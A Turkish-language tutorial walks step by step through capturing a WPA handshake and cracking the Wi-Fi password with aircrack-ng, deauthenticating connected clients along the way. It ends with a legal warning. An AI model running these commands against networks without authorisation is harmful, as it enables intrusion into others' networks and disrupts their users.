Gerekli Araçlar (Başlamadan Önce)
- Kali Linux veya benzeri bir pentest işletim sistemi (örn: Parrot OS) | KALİ LİNUX NASIL KURULUR BİLMİYORSANIZ BURDAN BAKIN Tıkla
- Monitör mod destekli bir Wi-Fi adaptörü | Wİ-Fİ ADAPTÖR ÖNERİLERİ İÇİN BURAYA BAKIN Tıkla
- aircrack-ng paketi (Kali’de kurulu geliyor zaten)
- (İsteğe bağlı) Wordlist dosyası – Örneğin:
rockyou.txt
1️⃣ Monitör Modu Nasıl Açılır?
İlk adım: Wi-Fi adaptörünü monitör moduna almak. Bu, ağ trafiğini dinleyebilmek için şart.
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Daha kolayı mı var? Elbette var. airmon-ng
komutuyla hızlıca:
airmon-ng start wlan0
Sonrasında adaptör ismi genelde wlan0mon
olur. Bunu unutma.
2️⃣ Ortamda Hangi Wi-Fi Ağları Var? (Tarama)
Artık çevrendeki tüm kablosuz ağları görebilirsin:
airodump-ng wlan0mon
Burada karşına çıkacak:
- SSID: Ağın ismi
- BSSID: MAC adresi
- Kanal (CH): Yayın yaptığı kanal
Hedefini seçip kenara not al.
3️⃣ Belirli Ağa Odaklanma (Ağ Takibi)
Hedef belli. Şimdi sadece o ağa odaklanıp handshake yakalama zamanı:
airodump-ng --bssid <BSSID> -c <kanal> -w /root/Desktop/wifi wlan0mon
<BSSID>
= hedefin MAC adresi<kanal>
= ağın yayın yaptığı kanal (örneğin: 6)-w
= yakalanan veriyi kaydedeceğin dosya konumu
4️⃣ Handshake Yakalama – Kullanıcıyı Bağlantıdan Düşürme
Ağa bağlı biri varsa onu kısa süreliğine ağdan düşürüp tekrar bağlanmasını sağlarız. Böylece o bağlantı anındaki veriyi (handshake) yakalarız.
aireplay-ng --deauth 10 -a <BSSID> wlan0mon
Bu işlem kullanıcıyı koparır ama 3-5 saniyede geri bağlanır. Biz de o sırada handshake’i yakalamış oluruz.
Yakalanan dosya.cap
uzantılı olur.
5️⃣ Aircrack ile Şifreyi Kırma (Wordlist Kullanarak)
Handshake dosyası elindeyse, artık iş brute-force’a kalıyor. aircrack-ng
ile kelime listesi kullanarak şifreyi denemeye başlıyoruz:
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> /root/Desktop/wifi-01.cap
Eğer hedef ağın şifresi wordlist’in içindeyse, kısa sürede bulur. Değilse… biraz uğraşman gerekebilir.
💡 Ekstra Bilgi: Şifre Bulunamazsa Ne Yapılır?
- Daha kaliteli wordlist kullan (örnek: CrackStation, Seclists, kendi hazırladığın listeler)
crunch
ile kişiye özel wordlist oluşturhashcat
kullanarak GPU destekli saldırı yap (daha hızlıdır)
⚠️ Uyarı ve Yasal Hatırlatma
Burada anlattığımız tüm işlemler kendi ağınızda test amaçlı yapılmalıdır. Başkasının ağına izinsiz giriş yapmak yasa dışıdır ve etik değildir.
Bu teknik bilgileri öğrenmek sizi siber güvenliğe bir adım daha yaklaştırır. Ama o adımı yanlış yere atarsan, hacker değil sanık olursun. Bilginin gücünü doğru kullan 💪